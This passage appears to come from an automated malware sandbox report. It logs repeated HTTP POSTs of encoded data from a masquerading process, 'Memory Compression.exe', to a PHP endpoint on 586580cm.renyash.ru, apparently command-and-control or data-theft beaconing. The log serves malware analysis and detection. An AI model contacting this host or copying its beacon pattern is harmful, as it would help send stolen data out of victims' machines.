                                                                                                                                Data Ascii: __]_Z\XW\_PWTVY]YW[]WTT_[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!^%V0\>2< 1"[3&;*1_*$W )60=+#!$#).^''P*)
                                                                                                                                Jan 11, 2025 15:02:48.261612892 CET805INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:02:48 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lc6QiZVtTmAMb5jIQZoHEdbl2aPv6l%2B084ldcM8vnzy8Jaq8G6gHFfh2GXzcRp9xjhj6akVT%2BvNmXiBcLsmnAA%2BUBdB4np3FZoM2vnMm1mqFwDBHWQWt1vgBAhcK0Cwnj40yYzkE"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 90057251be9741f3-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4543&min_rtt=2422&rtt_var=4612&sent=9&recv=9&lost=0&retrans=0&sent_bytes=1003&recv_bytes=3396&delivery_rate=1175523&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0
                                                                                                                                Jan 11, 2025 15:02:48.490948915 CET805INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:02:48 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lc6QiZVtTmAMb5jIQZoHEdbl2aPv6l%2B084ldcM8vnzy8Jaq8G6gHFfh2GXzcRp9xjhj6akVT%2BvNmXiBcLsmnAA%2BUBdB4np3FZoM2vnMm1mqFwDBHWQWt1vgBAhcK0Cwnj40yYzkE"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 90057251be9741f3-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4543&min_rtt=2422&rtt_var=4612&sent=9&recv=9&lost=0&retrans=0&sent_bytes=1003&recv_bytes=3396&delivery_rate=1175523&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                18192.168.2.549856104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:02:48.936696053 CET286OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 11, 2025 15:02:49.283179045 CET1060OUTData Raw: 5a 57 58 58 5f 59 58 53 5c 5f 50 57 54 51 59 5d 59 57 5b 5a 57 56 54 59 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: ZWXX_YXS\_PWTQY]YW[ZWVTY[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^"&(_+^#!"\38_=:)*; 9>T'Y.<7X6'T>;.^''P*5
                                                                                                                                Jan 11, 2025 15:02:49.380806923 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:02:49.630125046 CET797INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:02:49 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4SLlPWNSGgZN55k%2B9k5bZsYwswJSMAJs0WIe8He8teqzRtbGU1o7cpdN0DqvdTB3Uf9jpQXI65Zp1a7i%2FCL%2BBe2lKvjK9VO63OxJXQYtKlU84ujxILvAallwIi97Z7cDnTqxTFmo"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 9005725a5d9e4356-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=8476&min_rtt=1729&rtt_var=14142&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1346&delivery_rate=26209&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a
                                                                                                                                Data Ascii: 4;W^Q
                                                                                                                                Jan 11, 2025 15:02:49.716833115 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                19192.168.2.549867104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:02:50.804316998 CET286OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 11, 2025 15:02:51.158948898 CET1060OUTData Raw: 5f 54 58 5d 5f 5f 58 50 5c 5f 50 57 54 54 59 5f 59 54 5b 58 57 51 54 5c 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: _TX]__XP\_PWTTY_YT[XWQT\[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^"'#<X>1$ 3#=:=]=;#::'=(4 4'>.^''P*!
                                                                                                                                Jan 11, 2025 15:02:51.275372982 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:02:51.494570017 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:02:51.530246019 CET800INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:02:51 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xXf%2B1ISeNPD4sP7IeT%2Bs9TGYQJ9CovvW%2BW5XUVdW7SBeQFFJjEFzLaojHUx5HoyWeUS0cg8V3EEKQAUlhRFvfzSGeruYVpRP7z2Bb6Ibc4LIX6NHN2aeQTocbf1a8LYWpFvKnlyz"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900572662a7ac427-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4529&min_rtt=1487&rtt_var=6642&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1346&delivery_rate=56529&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                20192.168.2.549873104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:02:51.776807070 CET286OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 11, 2025 15:02:52.126779079 CET1060OUTData Raw: 5f 5f 5d 55 5f 53 58 57 5c 5f 50 57 54 51 59 58 59 50 5b 51 57 56 54 58 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: __]U_SXW\_PWTQYXYP[QWVTX[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^"17<,Z!"*$%\=>=]<W 9*S3Y.R?6!7+W=+.^''P*5
                                                                                                                                Jan 11, 2025 15:02:52.239808083 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:02:52.484543085 CET806INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:02:52 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r1WY6%2BOR6rQD8TFldyVEEgnD54mWq5AktgzLN3lJECrve2Y5jrTezdkojd0cGV5ZLx7apPs6HpsHOq9Sll3tZHLAJ6hfW0cH%2BlEXP7RKKcU%2BE59RI%2B77eOL63qG945AkLR%2Bi2bkT"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 9005726c3c7e7ce4-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3332&min_rtt=1950&rtt_var=3496&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1346&delivery_rate=112229&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                21192.168.2.549879104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:02:53.081454992 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1776
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                22192.168.2.549880104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:02:53.365694046 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:02:53.720542908 CET1060OUTData Raw: 5a 54 5d 5c 5f 5d 5d 50 5c 5f 50 57 54 50 59 52 59 53 5b 5f 57 51 54 5f 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: ZT]\_]]P\_PWTPYRYS[_WQT_[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^"% /(7!1*Z0%\=9=>(0T *U',9*5'Y 4#=;.^''P*1
                                                                                                                                Jan 11, 2025 15:02:53.818073034 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:02:54.046431065 CET797INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:02:54 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7NMi4b9qdSfa60jEsenzERPxIaBvdv3InlwUDl4jNj%2FYjqQcYoKdukyqbBCrnMVvZod1f3JaOIFFCCMAnAjzo9gquDbLw1ruPekR7fPfx72KggrrPCYnQLJmYpSzRZYHXiguR82z"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900572761dd341f3-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4894&min_rtt=1757&rtt_var=6933&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=54370&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                23192.168.2.549891104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:02:54.425347090 CET286OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 11, 2025 15:02:54.802416086 CET1060OUTData Raw: 5a 54 58 5a 5a 5f 5d 54 5c 5f 50 57 54 53 59 5f 59 50 5b 5a 57 54 54 5a 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: ZTXZZ_]T\_PWTSY_YP[ZWTTZ[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^"' ?+!4^ 1_3):5^)8;79>S$Y"?Z!$<>.^''P*=
                                                                                                                                Jan 11, 2025 15:02:54.887921095 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:02:55.142122030 CET800INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:02:55 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=06YIWKsjupDlwl8VHTux8gQ4RuyPL2Pcat0ZMk3nHz%2BJCoNfZmIeK5NHzfnaSs9wqrOkLEE9zjvNTySYaUOgQtsv7L6SlNc6dkDgG3r0dBdwKyTsT1I%2B6uWNkQWJXBC2RANR9hsx"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 9005727cc9ccc339-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2929&min_rtt=1659&rtt_var=3163&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1346&delivery_rate=123467&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                24192.168.2.549897104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:02:55.689758062 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:02:56.050457954 CET1060OUTData Raw: 5a 57 5d 5e 5a 5f 5d 54 5c 5f 50 57 54 52 59 5c 59 53 5b 5a 57 56 54 5a 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: ZW]^Z_]T\_PWTRY\YS[ZWVTZ[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!%(< [73/=_=*] V#9$,-*5 "(+.^''P*
                                                                                                                                Jan 11, 2025 15:02:56.153996944 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:02:56.320436001 CET804INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:02:56 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d6JSs%2BdzqtIPctRNFmwhi2LO3TWrSW0PvsC%2B0%2BPQDBhqM%2FlTmsjce5ZHHjC7AkJLw4oHTCQBq4GKVidE090xRKLqRm7FCEK4QYHRNMa327KiW8x733OoENZvKBfqsrnXQOLDVrkv"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 90057284aa505e86-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=8398&min_rtt=1827&rtt_var=13827&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=26840&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                25192.168.2.549903104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:02:56.581350088 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:02:56.941411018 CET1060OUTData Raw: 5f 57 5d 59 5a 5c 58 55 5c 5f 50 57 54 57 59 5d 59 54 5b 51 57 52 54 5f 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: _W]YZ\XU\_PWTWY]YT[QWRT_[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!Y&4<"!1''=)!^)#)5'/=+%;_6#T*+.^''P*-
                                                                                                                                Jan 11, 2025 15:02:57.030932903 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:02:57.288994074 CET804INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:02:57 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Pp2Vm162UrXPXrXokT%2Bw2ncMMuLUvwoWxg85wNK%2BSBrGSBtDsueuGNVlYzSfXLmjxBiUBBAO8O53ujN0VpugLLazgqdnHhscS1%2Bt9WllKrYdUWYjCKfG42oo%2F8wFaVFkDevxJ3g5"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 9005728a292b43e7-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3175&min_rtt=2922&rtt_var=1602&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=295068&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                26192.168.2.549909104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:02:57.539942026 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:02:57.892621994 CET1060OUTData Raw: 5f 54 5d 59 5f 5e 58 5d 5c 5f 50 57 54 5d 59 5c 59 57 5b 5a 57 57 54 51 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: _T]Y_^X]\_PWT]Y\YW[ZWWTQ[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!^2 '(24">[$5;>))=; #):S0<%(&4!7(>.^''P*
                                                                                                                                Jan 11, 2025 15:02:57.983935118 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:02:58.157828093 CET806INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:02:58 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sFguXm8eXa%2B4OVHm3%2BKem3urmv4%2BXKritImet%2BNv4MPaSQYggj0TxIQk7j1LpfpkvRFl%2FZOSjL4ur7N5UJVDDG7MZZEAQdM%2BtDSp%2FjLSbQJVOgGAYHGx2k45aES5ke%2F824OLRTb8"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900572902ec2433e-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1696&min_rtt=1624&rtt_var=754&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=662131&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a
